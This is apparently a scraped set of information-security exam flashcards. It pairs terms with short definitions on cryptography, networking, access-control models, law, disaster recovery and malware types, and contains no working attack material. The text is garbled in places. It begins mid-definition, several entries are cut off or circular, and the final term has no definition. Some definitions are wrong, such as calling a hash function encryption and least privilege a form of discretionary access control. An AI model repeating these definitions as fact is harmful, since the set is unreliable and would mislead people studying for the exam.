Used for fingerprinting data, images.

Trunks

Used to connect multiple switches.

Digital Signatures

Used to cryptographically sign documents. Provide nonrepudiation, including authentication of the identity and integrity of the data. ***Does not provide confidentiality***

Port Isolation

Used to ensure that individual systems cannot interact with other resources even if logically on the same subnet.

Couriers

Used to transfer media to and from offsite storage facility

Distance Vector Routing Protocols

Uses metrics to determine best route. i.e. hop count. Prone to routing loops where packets loop between two routers.

Covert Storage Channel

Uses shared storage, such as a temporary directory, to allow subjects to signal each other.

Encryption Keys in RAM

Usually exist in plaintext in RAM. May be recovered by "cold booting" a computer off a small OS installed

TCSEC Division A

Verified Protection, with a single class A1 (Verified Design). A1 contains everything class B3, plus additional controls.

Database Views

Views may be used to provide a constrained user interface

VLAN

Virtual LAN. Virtual Switch. Can take the place of switch for both Computer and Server LAN.

Boot sector virus

Virus that infects the boot sector of a PC. Loads upon system start

EAP-MD5

Weak form of EAP. It offers client → server authentication only. EAP-MD5 is also vulnerable to password cracking attacks

RAM & Virtual Memory

When RAM is full/nearly full The system will then swap process to virtual memory. Searches for idle processes so Impact is minimal

Entrapment

When law enforcement, persuades someone to commit a crime when the person otherwise had no intention to.

Storing Sensitive Information

When storing sensitive information; encrypt it. Encryption of data at rest ensures confidentiality. Chain of custody(physical security controls) are important in considering during transfer.

Kernel Mode(Supervisor Mode)

Where the kernel is. Allows low-level access to memory, CPU, disk, etc. Most trusted and powerful part of a system.

Layer 7 - Application

Where you interface with your computer application. Your Web browser, word processor, and instant messaging client exist

Polyinstantiation

allows two different objects to have the same. Database polyinstantiation means two rows have the same primary key, but different data.

WRT

Work Recovery Time describes the time required to configure a recovered system

Call Tree

Work around To congestion on phonelines during disaster.

Right to Audit

Written approval on behalf of organization being audited to allow the third part to commence the audit.

Macrovirus

Written in macro language (Microsoft office, excel)

Honeynets

a (real or simulated) network of honeypots. oneynets involve an entire network of systems and services that lack any legitimate devices

DLP

a class of solutions that are tasked specifically with trying to detect or, preferably, prevent data from leaving an organization in an unauthorized manner.

Solid State Drives

a combination of flash memory and DRAM. Degaussing has no effect. SSD's have logical blocks and are mapped to physical blocks

Password Control

a concern for management as well as the IT security professional. Written down, etc.

Key Escrow

a copy of the key is retained by the third-party organization(sometimes multiple...)

Cipher

a cryptographic algorithm

Integrated Product Team

a customer-focused group that focuses on the entire lifecycle of a project

Systems Development Life Cycle

a development model that focuses on security in every phase

Authenticator

a device such as an access point that allows a supplicant to authenticate and connect

Programmable Logic Device (PLD)

a field-programmable device, which means it is programmed after it leaves the factory. EPROMS, EEPROMS, and Flash Memory are all examples.

Acceptance Testing(ISTQB)

a formal testing with respect to user needs, requirements, and business processes conducted to determine whether or not a system satisfies the acceptance criteria and to enable the user, customers or other authorized entity to determine whether or not to accept the system."

Internet

a global collection of peered networks running TCP/IP, providing best effort service

Message Authentication Code(MAC)

a hash function that uses a key. A common MAC implementation is Cipher Block Chaining Message Authentication Code(CBC-MAC) eg: uses DES

Policy

a high-level management directive. Policy is mandatory. It does not delve into specifics. i.e. A company's sexual harassment policy.

Foreign Key

a key in a related database that matches a primary key in a parent database table.

Hot site

a location that an organization may relocate to following a major disruption or disaster. It is a datacenter with a raised floor, power, utilities, computer peripherals, and fully configured computers.

Assembly language

a low-level computer programming language. "SUB" "ADD," "JMP"

Aggregation

a mathematical attack where an attacker aggregates details at a lower classification to determine information at a higher classification

State Machine Model

a mathematical model that groups all possible system occurrences, called states. 'States' are evaluated and overall systems are proven to be secure upon close of evaluation.

Aggregation

a mathematical process: a user asks every question, receives every answer, and derives restricted information.

Dumpster Diving

a physical attack which a person recovers trash in hopes of finding sensitive information.

Topography

a physical shape of the land: hills, valley, trees, etc. High secure sites will leverage topology, eg: Military.

Continuity of Operations Plan

a plan to maintain operations during a disaster.

Tuple

a row, entry in a relational database table.

Disaster Recovery Plan

a short-term plan to recover from a disruptive event

Backdoor

a shortcut in a system that allows a user to bypass security checks.(skipping username/password authentication.)

Bayesian Filtering

a simple mathematical formula used for calculating conditional probabilities. Modern application to identify spam

Spiral Model

a software development model designed to control risk

Database

a structured collection of related data. Databases allow queries (searches), insertions (updates), deletions, and many other functions.

Honeypots

a system designed to attract attackers. Internal honeypots can provide high-value warnings of internal malware or attackers. Consult with legal staff before deploying a honeypot

Polymorphic virus

a virus that changes its signature upon infection of a new system, attempting to evade signature based antivirus software

Vulnerability

a weakness in a system

NDA

a work-related contractual agreement that ensures that, prior to being given access to sensitive information or data, an individual or organization appreciates their legal responsibility to maintain the confidentiality of that sensitive information.

Authorization

actions authenticated subjects are allowed to perform on a system

MAC Address

address is the unique hardware address of an Ethernet network interface card (NIC), typically "burned in". 48-bit and 64 bit(EUI-64)

Privilege escalation

allow an attacker with (typically limited) access to be able to access additional resources

Network Model(People)

allows branches of a hierarchical database to have two parents. Ex: Organization's hierarchy.

European Union(EU) Privacy Directive

allows for the free flow of information while still maintaining consistent protection of each member nation's citizens' data

DHCP

allows more configuration options, as well as assigning temporary IP address leases to systems

Salt

allows one password to hash multiple ways. Some systems (like modern UNIX/Linux systems) combine a salt with a password before hashing

Data Analytics

allows organization to better understand the typical use cases and a baseline of what constitutes typical or normal interaction with the data base.

Lattice-Based Access Controls

allows security controls for complex environments. there are defined upper and lower access limits implemented by the system. Allows reaching of higher and lower data classification, depending on the needs of the customer. Subjects have a Least Upper Bound and Greatest Lower Bound

Pivot

allows the attacker to establish a foothold 'behind enemy lines' (behind the firewall) and surf to internal websites, etc. Horizontal escalation is a form of pivoting. Non-privileged user to another Non-privileged.

Gateway-to-gateway(IPsec)

also called point-to-point) connects two IPsec gateways

The Operational Acceptance test

also known as Production acceptance test validates whether the system meets the requirements for operation.

Due Diligence

always meeting or exceeding the requirements for protection of assets. prudent in investigation of potential threats.

Extreme Programming(XP)

an Agile development method that uses pairs of programmers who work off a detailed specification

Nonrepudiation

an assurance that a specific user performed a specific transaction and that the user performed a specific transaction. Cannot repediate(deny)

Password guessing

an online technique that involves attempting to authenticate a particular user to the system

Common Object Request Broker Architecture

an open vendor-neutral networked object broker framework by the Object Management Group. Competes with Microsoft DCOM.

End User License Agreements(EULA's)

an unusual form of contract because using software typically constitutes contractual agreement.

Subject

and active entity on an information system

Covert channel

any communication that violates a security policy. Used by malware installed on a system that locates.

Disaster

any disruptive event that interrupts normal system operations

Hybrid Attacks

appends, prepends, or changes characters in words from a dictionary before hashing, to attempt the fastest crack of complex passwords. For complex passwords. Example: Replaces each letter "o" with the number "0"

Triple DES

applies single DES encryption three time per block. Formally called "TDEA" Held up well after years of cryptanalysis. Primary weakness is that is it slow. Encrypt, Decrypt, Encrypt. Three unique keys 1TDES EDE, 2 TDES EDE, 3TDES EDE.

Reciprocal agreements

are a bi-directional agreement between two organizations in which one organization promises another organization that it can move in and share space if it experiences a disaster.

Maintenance hooks

are a type of backdoor they are shortcuts installed by designers and programmers to allow developers to bypass normal system checks during development.

Fourth-generation programming languages (4GL)

are computer languages that are designed to increase programmer's efficiency by automating the creation of computer programming code.

DRP Review

basic form of initial DRP testing, and is focused on simply reading the DRP in its entirety to ensure completeness of coverage.

Respond

begins the process of assessing the damage

Combinatorial software testing

black-box testing method that seeks to identify and test all unique combinations of software inputs

Physical Countermeasures

building, office security, locks, security guards, mobile device encryption.

DHCPv6

called "stateful autoconfiguration

Corrosion

can be caused by High Humidity Levels

VLAN

can be though of as a virtual switch. Act as both a computer switch and a server switch. FF:FF:FF:FF:FF:FF traffic will reach all computers but not servers.

Credential Management Systems

can help harden user credentials in meaningful ways.

Object-Oriented Programming

changes the older procedural programming methodology, and treats a program as a series of connected objects that communicate via messages

Organization for Economic Cooperation and Development (OECD)

consists of 30 member nations from around the world. Provide a basic framework for the protections that should be afforded of personal data.

Botnet

contains a central command and control network, managed by humans called bot herders. Term zombie is used to describe a bot. Many use IRC

Take-Grant Protection Model

contains rules that govern the interactions between subjects and object, and permissions subjects can grant to other subjects. Rules include: take, grant, create, and remove

Hypervisor

controls access between virtual guests and host. Type 1 Hypervisor(bare metal) is part of an operating system that runs directly on host hardware, VMware ESX. Type 2 Hypervisor runs an application on a normal operating system.

Encryption

converts plaintext to ciphertext

Data Controllers

create and manage sensitive data within and organization. HR employees are often data controllers.

Genetic programming

creates random programs and assigns them a task of solving a problem. The fitness function describes how well they perform their task

Utility Reliability

critical for site selection. Protecting against outages and failures is key.

Digital forensics

dealing with investigations and evidence with special consideration of the legal aspects of this process

Standards

describe the specific use of technology. Often applied to hardware. Standards are mandatory. They lower the Total Cost of Ownership(TCO)

Work Factor

describes how long it will take to break a cryptosystem.

Mean Time to Repair

describes how long it will take to recover a failed system

Throughput

describes the process of authenticating to a biometric system., A typical throughput is 6-10 seconds

Layer 1 - Physical

describes units of data such as bits represented by energy

Scope(Policy)

describes what systems, people, facilities, and organizations are covered by the policy.

Network Model

description of how a network protocol suite operates. OSI Model

Chinese Wall Model

designed to avoid conflicts of interest by prohibiting one person, such as a consultant, from accessing multiple conflict of interest categories (CoIs)

Analog

designed to carry the human voice. A vinyl record is analog

Diameter

designed to provide an improved Authentication, Authorization, and Accounting (AAA) framework. Diameter uses a single server to manage policies for many services, as opposed to RADIUS that requires many servers to handle all of the secure connection

Duress Warning Systems

designed to provide immediate alerts to personnel in the event of emergencies. violence, weather, chemical contamination. i.e. Speaker Systems

Destruction

destructive methods include: incineration, pulverizing, shredding, and bathing metal components in acid.

BRP

details the steps required to restore normal business operations after recovering from a disruptive event

Closed Circuit Television (CCTV)

detective device used to aid guards in detecting the presence of intruders in restricted areas. Key issues include depth of field (the area that is in focus) and field of view (the entire area viewed by the camera). Pan and Tilt. Backed up my magnetic tape

Least Privelage

dictates that persons have no more than the access that is strictly required for the performance of their duties. Least Privelage is a form of Discretionary Access Control (DAC)

Static

discharges to balance a positive and negative electrical imbalance. Can cause damage to systems. Mitigated by proper humidity

Confidential

disclosure could cause damage to national security.

Top Secret

disclosure could cause exceptionally grave damage to national security.

Secret

disclosure could cause serious damage to national security.

Communicate

disseminating details regarding the organization's recovery status

Formal Access Approval

documented approval from the data owner for a subject to access certain objects. Requires subject understand all rules regarding access, consequences should data become lost, destroyed or compromised

Erase Operation

does not overwrite blocks. Data is written to flash on a page level and a page must be completely erased before it can be written to again.

Due Care

doing what a reasonable person would do. The "prudent man" rule. i.e Parents have a duty to care for their children. Due diligence is management of due care.

Asymmetric Encryption

encryption that uses two keys: if you encrypt with one you may decrypt with the other.

Full Disk Encryption (FDE)

encrypts an entire disk. This is superior to partially encrypted solutions, such as encrypted volumes, directories, folders or files

Emanations

energy that escapes an electronic system

Asset Tracking

enhance physical security. Asset tracking databases support regulatory compliance by identifying where data is.

Availability

ensure that information is available when needed

Safety Warden

ensures that all personnel safely evacuate the building in the event of an emergency or drill.

Full disk encryption

ensures the confidentiality of mobile device data. Superior to partially encrypted solutions.

Layer 3 - Network

escribes routing: moving data from a system on one LAN to a system on another. IP Address

Program Policy

establishes an organizations information security program.

Anomaly Detection

establishing a baseline of normal traffic. Alerting on abnormal network activity. Can detect new attacks

Exigent circumstances

evidence regarding an immediate threat to human life or of evidence being destroyed.

Security Incident

exists if the events suggest that violation of an organization's security posture has or is likely to occur.

Grey hat hackers

fall between the black and white hat hackers. Acts without malicious intent. The goal of a gray hat is to improve system and network security.

Static Random Access Memory (SRAM)

fast, expensive memory that uses small latches called "flip flops" to store bits. Maintains integrity as long as power is supplied.

3 Types of Backups

full backup, incremental backup and differential backup.

White box software testing

gives the tester access to program source code, data structures, variables, etc

Black box testing

gives the tester no internal details: the software is treated as a black box that receives inputs

Simulation Test/Walkthrough Drill

goes beyond talking about the process and actually has teams to carry out the recovery process.

Layer 2 - Data Link

handles access to the physical layer as well as local area network communication

Layer 4 - Transport

handles packet sequencing, flow control, and error detection. TCP and UDP are Layer 4 (Maintenance)

"Bad" blocks/clusters/sectors

hard disks routinely end up with sectors that cannot be read due to some physical defect. The sectors marked as bad will be ignored by the operating system since no data could be read in those defective portions

Coaxial

has an inner copper core("D") separated by an insulator("C"), plastic outer("A"

Wet pipes

have water right up to the sprinkler heads. Bulbs come in different colors rated for different temperatures

Hand Geometry

he devices use a simple concept of measuring and recording the length, width, thickness, and surface area of an individual's hand

Perimeter Defenses

help prevent, detect, and correct unauthorized physical access. Ideal qualities; safe, prevents ingress, authentication and accountability.

Stealth virus

hides itself from the OS and other protective software, such as antivirus software

Accountability

holds users accountable for their actions

Octets 2,3,4

host

IPsec Architectures

host-to-gateway, gateway-to-gateway, and host-to-host.

Service Level Agreements (SLA)

identifies key expectations that the vendor is contractually required to meet. Primarily address availability

Sashimi Model

ighly overlapping steps; it can be thought of as a real-world successor to the Waterfall Model. named after the Japanese delicacy Sashimi, which has overlapping layers of fish.

Data Remanence

important to media sanitization and data destruction. Could refer to residual data that persists on magnetic storage.

Responsibilities(Policy)

include responsibilities of information security staff, policy and managements teams, as well as responsibilities of all members of the organization.

Federal Interest Computer

includes government, critical infrastructure, or financial processing system.

Live forensics

includes taking a bit by bit, or binary image of physical memory, gathering details about running processes, and gathering network connection data.

Striping

increasing the read and write performance by spreading data across multiple hard disks

pLagUe{USA}

injects viruses into autorun.inf

Insiders

insider attack is launched by an internal user who may be authorized to use the system that is attacked.

Bytecode

intermediary form (converted from source code), but still must be converted into machine code before it may run on the CPU. Platform-independent code

Parallel Processing

involve recovery of critical processing components at an alternate computing facility,

Synthetic Transactions

involves building scripts or tools that simulate activities normally performed in an application. Ensure the application is still performing as expected

Mitigation

involves the process of understanding the cause of the incident so that the system can be reliably cleaned and ultimately restored to operational status later in the recovery phase.

Extranet

is a connection between private Intranets, such as connections to business partner Intranets

Free software

is a controversial term that is defined differently by different groups.

Kerberos

is a third-party authentication service that may be used to support Single Sign-On. AAA systems: authentication, authorization, and accountability. Main parts; represent the client, the KDC, and the server

Freeware

is free of charge to use

Outsourcing

is the use of a third party to provide Information Technology support services that were previously performed in-house. Enhances the information technology resources.

Certificate Authorities(CA)

issues digital certificates. May be private or public(VeriSign)

Rotation of Duties

job rotation or rotation of responsibilities, provides an organization with a means to help mitigate the risk associated with any one individual having too many privileges

Server-side attacks(service side)

launched directly from and attacker to a listening service. The "Conficker" worm of 2008 spread via a number of methods. TCP port 445 and exploiting a weakness in RPC. Patching, system hardening, firewalls, and other forms of defense in depth.

Criminal Law

laws where the victim can be seen as society itself. To maintain and orderly and law abiding citizenry. Goal is deter crime and punish offenders.

Network Attacks

leverage client-side attacks, server-side attacks, or Web application attacks

Public Key Infrastructure(PKI)

leverages all three forms of encryption to provide and manage digital certificates. Standard digital certificate format for PKI is x.509

CSRF

leverages third-party redirect of static content within the security context of a trusted site.

Modular Math

lies behind much of cryptography. Simply put, modular, math shows you what remains (the remainder) after division. Called "clock math"

Certificate Revocation List(CRL)

lists certificates that have been revoked.

Payment Card Industry Data Security Standard (PCI-DSS)

major vendors in payment card portion of the financial industry. Ensure better protection of cardholder data through mandating security policy, security devices, control techniques, and monitoring of systems of cardholder data.

Static NAT

makes a one-to-one translation between addresses

Zero-Day Exploits

malicious code for which there is not existing vendor-supplied patch.

Logic Bomb

malicious program that is triggered when a logical condition is met. Such as after a number of transactions have been process, or on a specific date/time.

Computer viruses

malware that does not spread automatically: require catalyst(human)

Trojan

malware that performs two functions. One benign(obfuscation), one malicious.

Worms

malware that self-propagates

Data processors

manage data on behalf of data controllers. An outsourced payroll company is an example of a data processor.

Layer 5 - Session

manages sessions, which provide maintenance on connections. (Maintenance)

Harrison- Ruzzo-Ullman Model

maps subjects, objects, and access right to an access matrix. It is considered a variation to the Graham-Denning Model. 6 Primitive Operations: Create Object Create Subject Destroy Subject Destroy Object Enter right into access matrix Delete right from access matrix

Biometrics

may be used to establish an identity, or to authenticate (prove an identity claim) Eg: Airport Facial Recognition

Packet Switched Networks

may use Quality of Service (QoS) to give specific traffic precedence over other traffic. QoS is often applied to Voice Over IP (VoIP). Avoids Interruption

Entity integrity

means each tuple has a unique primary key that is not null.

Convergence

means that all routers on a network agree on the state of routing

Dedicated(Mode of Operation)

means that the system contains objects of one classification label. Subjects must have equivalent clearance as objects. All subjects must possess a clearance equal to or greater than the label of objects.

Parity

means to achieve data redundancy without incurring the same degree of cost as that of mirroring in terms of disk usage and write performance.

Voiceprint

measures the subject's tone of voice while stating a specific sentence or phrase

Configuration Item Identification

methodology for selecting and naming configuration items that need to be placed under CM

Database replication

mirrors a live database allowing simultaneous reads and writes to multiple replicated databases by clients

Technical Controls

mitigate infected mobile computers and devices.

Host-to-host(IPsec)

mode connects two systems (such as file servers) to each other via IPsec

Protocol Behavior IDS

models the way protocols should work, often by analyzing RFCs (Request for Comments) RFC 793 describes TCP flags

FRR preferred over FAR

most organizations would prefer to reject authentic subjects to accepting impostors

Clipper Chip

name of tech used in Escrowed Encryption Standard(EES), announced in 1993 by US Gov. Used Skipjack algorithm. Symmetric cipher that uses an 80 bit key. Originally a secret algorithm.

Network Stack

network protocol suite programmed in software or hardware

Baseband

networks that have one channel and can only send one signal at a time.

Ignorance of the Law

never an excuse for breaking the law.

Read Only Memory(ROM)

nonvolatile memory that maintains integrity after loss of power

Inference and Aggregation

occur when a user is able to use lower level access to learn restricted information.

Access aggregation

occurs as individual users gain more access to more systems

Reading Down

occurs when a subject reads an object at a lower sensitivity level. Ex: Top Secret subject reading Secret subject. Subject reads down; data flows up.

Metasploit

open source Penetration Testing Tool

Public Cloud Computing

outsources IT infrastructure, storage, or application to a 3rd provider. Cloud Computing provide Infrastructure as a Service(IaaS, eg: Linux Server Hosting), Software as a Service(SaaS, eg: Web Service Hosting), Platform as a Service(PaaS, eg: Web Mail).

Offshoring

outsourcing to another country. Can raise privacy and regulatory issues.

Frame Relay

packet-switched Layer 2 WAN protocol that provides no error recovery and focuses on speed

Administrative Countermeasures

policies, procedures, guidelines, standards.

Allocated space

portions of a disk partition that are marked as actively containing data

Unallocated space

portions of a disk partition that do not contain active data

Financial Damages: Statutory

prescribed by law, which can be awarded to the victim even if the victim incurred no actual loss or injury.

Separation of duties

prescribes that multiple people are required to complete critical or sensitive transactions

CO2

removing oxygen smothers fires

Configuration Monitoring

process for assessing or testing the level of compliance with the established baseline configuration and mechanisms for reporting on the configuration status of items placed under CM

Configuration Change Control

process for managing updates to the baseline configurations for the configuration items

Patch Management

process of managing software updates. All software has flaws or shortcomings that are not fully addressed in advance of being released

Protocol Governance

process of selecting the right method cipher and implementation of selecting the right method (cipher)

Brownout

prolonged low voltage

Generators

protect against electric failures. Designed to provide power for longer periods of times. Always place generators about potential flooding areas

Transport Mode

protects the IP data (layers 4-7) only, leaving the original IP headers unprotected. Both modes add extra IPsec headers

Secure Hardware Architecture must...

provide confidentiality, integrity, and availability for processes, data, users.

Circuit-switched networks

provide dedicated bandwidth to point-to-point connections, such as a T1. Dedicated to purpose is a drawback

Kerberos Strength

provide mutual authentication. Mitigates replay attacks.

Packers

provide runtime compression of executables

Software Change and Configuration Management

provides a framework for managing changes to software as it is developed, maintained, and eventually retired.

Network Tap

provides a way to "tap" into network traffic. NIDS. Can "fail open"

SubBytes

provides confusion by Substituting the bytes of the state according to a substitution table. 1. Take byte of state to be substituted "T" 2. T is hex 53 3. 5 on X Row, 3 on Y Column

Mix Columns

provides diffusion by mixing via finite field mathematics

Hash Function

provides encryption using an algorithm and no key. One-way hash functions. Plaintext changes to fixed message length. Weaknesses found in bot MD5 and SHA1

Full-Knowledge Test/ Crystal Box

provides internal information to the penetration tester, including network diagrams, policies and procedures, and sometimes reports from previous penetration testers

Zachman Framework for Enterprise Architecture

provides six frameworks for providing information security, asking what, how, where, who, when, and why, and mapping those frameworks across rules including planner, owner, designer, builder, programmer, and user.

Authentication

proving an identity claim

Virtual SAN

provisioning of virtualized storage

Asymmetric Encryption

public key, private key. Encrypt public, Decrypt private

Open source

publishes source code publicly. Ubuntu, Apache

MTBF

quantifies how long a new or repaired system will run before failing

Mean Time Between Failures

quantifies how long a new or repaired system will run on average before failing

Assurance correctness

range from E0(inadequate) to E6(formal model of security policy); Functionality rating range include TCSEC equivalent ratings(F-C1, F-C2, etc.)

Layer 2 Broadcast Traffic

reaches all nodes in a "broadcast domain."

Warm Site

readily accessible hardware and connectivity, but it will have to rely upon backup data in order to reconstitute a system after a disruption.

Benefits of Cloud

redueced upfront capital expenditure, reduced maintenance costs, robust levels of service, and overall operational cost savings.

Password cracking

refers to an offline technique in which the attacker has gained access to the password hashes or database

Keyboard dynamics

refers to how hard a person presses each key and the rhythm by which the keys are pressed

Static analysis

review the raw source code itself looking for evidence of known insecure practices, functions, libraries, or other characteristics having been used in the source code

Vulnerability scanning

scans a network or system for a list of predefined vulnerabilities such as system misconfiguration, outdated software, or a lack of patching.

Data mining

searches large amounts of data to determine patterns that would otherwise get lost in the noise. Credit card issuers are experts in Data mining. "X or more purchases, in Y time, in Z places.

Level 1 Cache

second fastest form of cached memory, located On the CPU itself

VPN

secure data sent via insecure networks such as the Internet.

Dynamic testing

security checks are performed while actually running or executing the code or application under review

Chaining

seeds the previous encrypted block into the next block to be encrypted. Destroying patterns in resulting ciphertext

Denial of Service(DoS) Attack

seeks to deny service(or availability) of a system

Database normalization

seeks to make the data in a database table logically concise, organized, and consistent.

Integrity

seeks to prevent unauthorized modification of information. In other words, integrity seeks to prevent unauthorized write access. Ensure data accuracy and completeness

System Integrity

seeks to protect a system, such as a Windows 2008 server operating system, such as a

Data Integrity

seeks to protect information against unauthorized modification

Ping

sends an ICMP Echo Request to a node and listens for an ICMP Echo Reply

Sensitive but Unclassified

sensitive data that is not a matter of national security

Time Multiplexing

shares system resources between mulitple process, each with a dedicated slice of time.

Electrical Fault

short and long-term interruption of power. Impact availability and integrity. Sudden loss of power can damage Disk

Backdoors

shortcuts in a system that allow a user to bypass security checks (such as username/password authentication) to log in

Common Law

significant emphasis on particular cases and judicial precedents as determinants of the laws. Typically legislative bodies tasked with the creation of new statutes and laws.

Deluge

similar to dry pipes, except the sprinkler heads are open and larger than dry pipe heads.

Machine code

software that is executed directly by the CPU

Hacktivist

someone who hacks for political reasons. Vietnamese DDos.

Monoalphabetic Cipher

specific letter is substituted for another

Kerberos Weakness

stores the keys of all principles(clients and servers) KDC and TGS are single points of failure.

Network Forensics

study of data in motion, with special focus on gathering evidence via a process that will support admission into court

Sequential Memory

such as tape, must sequentially read memory, beginning at offset zero, to the desired portion of memory, beginning at offset zero.

Button locks

susceptible to brute force and shoulder surfing

RC5, RC6

symmetric block cipher by RSA. Uses 32, 64, or 128 bit blocks. Key size ranges from zero to 2040 bits.

Blowfish and Twofish

symmetric block ciphers created by Bruce Schneier. Uses 32 through 448 bit keys to encrypt 64 bit blocks. Was a finalist

Redundant Systems

system availability is extremely important, then it might be prudent to have entire systems available in the inventory

Mandatory Access Control

system-enforced access control based on subject's clearances and object's labels

Dry pipe

systems also have closed sprinkler heads: the difference is the pipes are filled with compressed air

Redundant Hardware

systems or devices that have redundant onboard power in the event of a power supply failure.

Recovery Controls

taken in order to restore functionality of the system and organization.

Hardware Segmentation

takes process isolation further by mapping process to specific locations

Spike

temporary high voltage

Sag

temporary low voltage

Preparation

teps taken before an incident occurs. Training, writing incident response policies

Teraflop

teraflop

Direct Evidence

testimony provided by a witness regarding what the witness actually experienced with her five senses.

Read-Through

testing lists all necessary components required for successful recovery, and ensures that they are, or will be, readily available should a disaster occur.

Acceptance Testing

testing to ensure the software meets the customer's operational requirements

Referential integrity

that every foreign key in a secondary table matches a primary key in the parent table

Accountability

the ability to audit a system and demonstrate the actions of subjects

Electronic Vaulting

the batch process of electronically transmitting data that is to be backed up on a routine, regularly scheduled time interval

Accreditation

the data owner's acceptance of the certification, and of the residual risk, which is required before the system is put into production.

Evaluation Assurance Level (EAL)

the evaluation score of the tested product or system

Business Impact Analysis (BIA)

the formal method for determining how a disruption to the IT system(s) of an organization will impact the organization's requirements, processes, and interdependencies with respect the business mission.

Walkthrough/Tabletop

the goal is to allow individuals who are knowledgeable about the systems and services targeted for recovery to thoroughly review the overall approach

Log Reviews

the goal is to review logs to ensure they can support information security as effectively as possible

Cold Site

the least expensive recovery solution to implement. It does not include backup copies of data, nor does it contain any immediately available hardware.

Zero-Knowledge Test.

the penetration tester begins with no external or trusted information

Confusion

the plaintext and ciphetext should e as confused or random as possible.

Response

the point at which the incident response team begins interacting with affected systems and attempts to keep further damage from occurring as a result of the incident

Mandatory Leave/Forced Vacation

the primary security considerations are similar to that addressed by rotation of duties. Forcing all employees to take leave can identify areas where depth of coverage is lacking

Tailoring

the process of customizing a standard for an organization. Begins with controls selection, continues with scoping, and finishes with the application of compensating controls.

System High

the system contains objects of mixed labels (e.g., confidential secret, and top secret.) All subjects must possess a clearance equal to or greater than the label of objects.

Certification

the system has been certified to meet the security requirements of the data owner.

Activate Team

the team that will be responsible for recovery needs to be activated.

Collusion

the term used for the two parties conspiring to undermine the security of the transaction

Total Cost of Ownership(TCO)

the total cost of a mitigating safeguard. TCO combines upfront costs plus annual cost of maintenance, staff hours, fees, etc.

Routing Protocol Goal

to automatically learn a network topology, and learn the best routes between all network points

Information Security Professional Mission

to balance the needs of confidentiality, integrity, and availability, and make trade-offs as needed.

High Availability

to decrease the recovery time of a system or network device so that the availability of the service is less impacted than would be by having to rebuild, reconfigure, or otherwise stand up a replacement system

Scoping

to define exactly what assets are protected by the plan (BCP), which emergency events this plan will be able to address, and finally determining the resources necessary to completely create and implement the plan

Vendor Governance

to ensure that a business is continually getting sufficient quality from it's 3rd Party Providers

Reconstitution

to successfully recover critical business operations either at primary or secondary site

Change Management

to understand, communicate, and document any changes with the primary goal of being able to understand, control, and avoid direct or indirect negative impact that the change might impose

Object Encapsulation

treats a process as a black box.

Twisted Pair Cabling

twisting them together dampens the magnetism making them less susceptible to EMI. Cable Category 1 through 6. Categories begin at Cat 3.

NIST Special Publication 80-128

uide for Security-Focused Configuration Management of Information Systems

Trademark dilution

unintentional attack in which the trademarked brand name is used to refer to the larger general class of products. i.e. Kleenex

Biometric controls

usable by all staff, or compensating controls must exist. Potential exchange of bodily fluid is a serious negative for any biometric control EG: Airport bathrooms no handles

Distance Vector Routing Protocols

use

Synchronous dynamic tokens

use time or counters to synchronize a displayed token code with the code expected by the authentication server. Eg: Citi Text code.

One-time passwords

used for a single authentication. They are very secure but difficult to manage

Initialization Vection

used in symmetric ciphers to ensure that the first encrypted block of data is random

Clipping levels

used to differentiate between malicious attacks and normal users accidentally mistyping their passwords. Define a minimum reporting threshold leve

Symmetric Encryption

uses one key to encrypt and decrypt. Usually shared out-of-band such as face-to-face. Also called "Secret key" encryption.

Closed System

uses only proprietary hardware or software.

Open System

uses open hardware and standards, using standard components from a variety of vendors. An IBM-compatible PC is an Open system.

Social Engineering

uses the human mind to bypass security controls.

Proprietary software

usually copyrighted and possibly patented

TTL field

very time a packet passes through a router, the router decrements the TTL field. Reaches 0, drops packet. ICMP Time Exceeded message to the clien

Multipartite

virus that spreads via multiple vectors

Random Access Memory(RAM)

volatile hardware memory that loses integrity after loss of power

SanDisk Secure Erase Command

when command is executed all blocks in the physical address space, whether they are currently or previously allocated to the logical space, are completely erased.

Differential

will back up any files that have been changed since the last full backup. EX: For Monday's differential backup, only those files that have been changed since Sunday's backup will be archived

Dry Powder

works by lowering temperature and smothering the fire, starving it of oxygen.

OWASP Enterprise Security API Toolkits

• Authentication • Access control • Input validation • Output encoding/escaping • Cryptography • Error handling and logging • Communication security • HTTP security • Security configuration

Applications

• Client requests and server responses • Usage information • Significant operational actions

Change Management Process

• Identifying a change • Proposing a change • Assessing the risk associated with the change • Testing the change • Scheduling the change • Notifying impacted parties of the change • Implementing the change • Reporting results of the change implementation Changes must be auditable

BCP/DRP Mistakes

• Lack of management support • Lack of business unit involvement • Lack of prioritization among critical staff • Improper (often overly narrow) scope • Inadequate telecommunications management • Inadequate supply chain management • Incomplete or inadequate crisis management plan • Lack of testing • Lack of training and awareness • Failure to keep the BCP/DRP plan up to date

Kerberos Components

• Principal: Client (user) or service • Realm: A logical Kerberos network • Ticket: Data that authenticates a principal's identity • Credentials: a ticket and a service key • KDC: Key Distribution Center, which authenticates principals • TGS: Ticket Granting Service • TGT: Ticket Granting Ticket • C/S: Client/Server, regarding communications between the two

Snort Active Response Rules

• Reset_dest: send TCP RST to destination • Reset_source: send TCP RST to source • Reset_both: send TCP RST to both the source and destination • Icmp_net: send ICMP network unreachable to source • Icmp_host: send ICMP host unreachable to source • Icmp_port: send ICMP port unreachable to source • Icmp_all: send ICMP network, host and port unreachable to source

Individual Participation Principle

1. Able to find out if an entity holds any of their personal info 2. Made aware of any personal information being held 3. Given a reason for any denials to account for personal data being held 4. Able to challenge the content of any personal data being held.

Best Evidence rule

Original documents are preferred over copies. conclusive, tangible objects are preferred over oral testimony.

Color of law

Acting under the guise of/on behalf of law enforcement. i.e. Information Security Proffessional acting under the Color of Law.

Computer as a Tool

Crimes where the computer is a central component enabling the commission of the crime. Compromising database server, leveraging computers to steal cardholders data.

Burden of Proof

Criminal: beyond reasonable doubt Civil: preponderance of the evidence

Copyright Act of 1976

Criteria to determine whether a use would be covered by the fair use doctrine: The purpose and style of excerpt, the nature of copyrighted work; the amount of conte

Evidence

Information Security Professionals should attempt to provide all evidence, regardless of whether that evidence proves or disproves the facts of the case.

***EXAM WARNING***

Keep all examples on the exam simply by determining whether they fall into the definition of a subject or an object.

Gross Negligence

Opposite of due care. Absence of due care. Legally important concept.

Collection Limitation Principle

Personal data collection should have limits, obtained in a lawful manner, and unless there is a compelling reason to the contrary.

Data Quality Principle

Personal data should be complete, accurate, and maintained in a fashion consistent with the purposes for the data collection.

Authentication

Proving and identity claim. You authenticate the identity claim by supplying information or objects only you would possess. i.e. Driver's License, Password

Risk

a matched threat and vulnerability

Safeguard

a measure taken to reduce risk

Threat

a potentially negative occurrence

Counterfeiting

